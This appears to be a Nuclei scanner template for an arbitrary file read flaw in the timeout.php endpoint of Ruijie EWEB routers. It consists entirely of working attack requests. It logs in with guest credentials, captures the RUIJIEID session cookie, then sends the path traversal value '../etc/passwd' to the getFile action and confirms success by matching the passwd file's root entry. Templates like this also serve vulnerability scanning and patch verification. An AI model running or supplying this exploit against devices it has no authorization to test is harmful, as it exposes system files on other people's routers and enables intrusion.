id: ruijieEWEB-timeout_php-File-reading

info:
  name: 锐捷EWEB路由器 timeout.php 任意文件读取漏洞
  author: xxx
  severity: high
  tags: File reading

http:
  - raw:
      - |
        POST /ddi/server/login.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
        Content-Type: application/x-www-form-urlencoded

        username=guest&password=guest?
    extractors:
      - type: regex
        part: header
        name: RUIJIEID
        group: 1
        regex:
          - 'RUIJIEID=(.*?);'
        internal: true
  - raw:
      - |
        POST /system_pi/timeout.php?a=getFile HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
        Cookie: {{RUIJIEID}}
        Content-Type: application/x-www-form-urlencoded

        fileName=../etc/passwd
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0'
      - type: status
        status: 
          - 200